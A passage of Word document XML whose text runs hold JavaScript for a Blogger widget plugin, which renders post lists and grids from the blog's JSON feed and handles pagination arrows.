        <w:t xml:space="preserve">                            c= c + '&lt;div class="col-sm-12 col-xl-6 first"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="kit-img" alt="'+title+'" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c= c + '&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c= c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        }//switch ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        //[END GRID WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  }//for loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  c = c + '&lt;/div&gt;&lt;!--/inrow--&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="row"&gt;&lt;div class="col-sm-12"&gt;&lt;div class="melesa-nav" data-clevel="1" data-level="'+ levels +'" data-total="'+ totalpost +'" data-count="'+ postcount +'" data-start="'+ startindex +'" data-type="'+ typ +'" data-label="'+ lbl +'"&gt;&lt;a class="mlsa-arrow mlsa-left disable" href="javascript:void(0);"&gt;&lt;i class="ion-chevron-left"&gt;&lt;/i&gt;&lt;/a&gt;&lt;a class="mlsa-arrow mlsa-right" href="javascript:void(0);"&gt;&lt;i class="ion-chevron-right"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  $t.html(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    $(this).html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                    $(this).find('.mlsa-left').click(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      //show loading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var $nav = $(this).closest('.melesa-nav');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var lev = $nav.attr('data-level');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var tps = $nav.attr('data-total');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var cnt = $nav.attr('data-count');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var sti = $nav.attr('data-start');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var lbl = $nav.attr('data-label');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var clev = $nav.attr('data-clevel');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      clev = Number(clev);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var type = $nav.attr('data-type');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var $tn = $(this);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      var ustart = Number(sti) - Number(cnt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      //console.log(ustart);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      if((clev &gt;= 2)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $(this).closest('.melesa-plugin').find('.melesa-loading').fadeIn();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        $.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          url : "/feeds/posts/default/-/" + lbl + "?alt=json-in-script&amp;max-results=5&amp;start-index="+ ustart,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          type: 'get',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          dataType: "jsonp",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          success: function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                            //console.log(JSON.stringify(e));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //for the same link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760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(clev == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $tn.addClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $tn.removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $tn.closest('.melesa-nav').find('.mlsa-right').removeClass('disable');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //update values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $nav.attr('data-clevel',clev - 1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            $nav.attr('data-start',ustart);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            //process markup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            if(e.feed.entry){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              var c ='&lt;div class="melesa-loading"&gt;&lt;div class="melesa-table"&gt;&lt;div class="melesa-cell"&gt;&lt;div class="cssload-thecube"&gt;&lt;div class="cssload-cube cssload-c1"&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div class="cssload-cube cssload-c2"&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div class="cssload-cube cssload-c4"&gt;&lt;/div&gt;</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;div class="cssload-cube cssload-c3"&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;h3&gt;Loading..&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              for(var i=0;i &lt; e.feed.entry.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                //grab details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var p = e.feed.entry[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var title = p.title.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                if(p.media$thumbnail){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  var pi = p.media$thumbnail.url;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  //check for the location for thumbnail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if(pi.indexOf('/s72-c') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    pi = pi.replace('/s72-c','/s1600');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if(pi.indexOf('img.youtube.com') !== -1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                    pi = pi.replace('/default.jpg','/maxresdefault.jpg');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }else{</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  var pi = 'https://3.bp.blogspot.com/-UKWIRzqbrE0/W2FUQVPeutI/AAAAAAAAACU/5JRAWbOBx9491ElSDj3krdSsZIfI7fjGwCLcBGAs/s1600/nf.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//pi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                for(var xc=0;xc&lt;p.link.length;xc++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if(p.link[xc].rel == 'alternate'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var pu = p.link[xc].href;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  if((p.link[xc].rel == 'replies') &amp;&amp; (p.link[xc].type == 'text/html') ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var cmt = p.link[xc].title;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//pu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var pa = p.author[0].name.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var pau = p.author[0].uri.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var time = p.published.$t;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                time = time.split('T');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var mnt = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sept", "Oct", "Nov", "Dec"];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                time = time[0].split('-');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                time = mnt[Number(time[1]) - 1] + ' ' +  time[2] + ', ' + time[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                var snipt =  snip(p.content.$t,25);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                switch(typ){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  case "list-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    if(ct &lt; 1){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                      c = c + '&lt;div class="col-sm-12 col-xl-6 first"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;img alt="'+title+'" src="'+ pi +'"&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/colsm6--&gt;&lt;div class="col-sm-12 col-xl-6 second"&gt;&lt;div class="row in"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }else{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      c = c + '&lt;div class="col-sm-12"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //[END LIST WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                  case "block-widget":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    var ct = i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    switch(ct){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 0:</w:t>
      </w:r>
    </w:p>
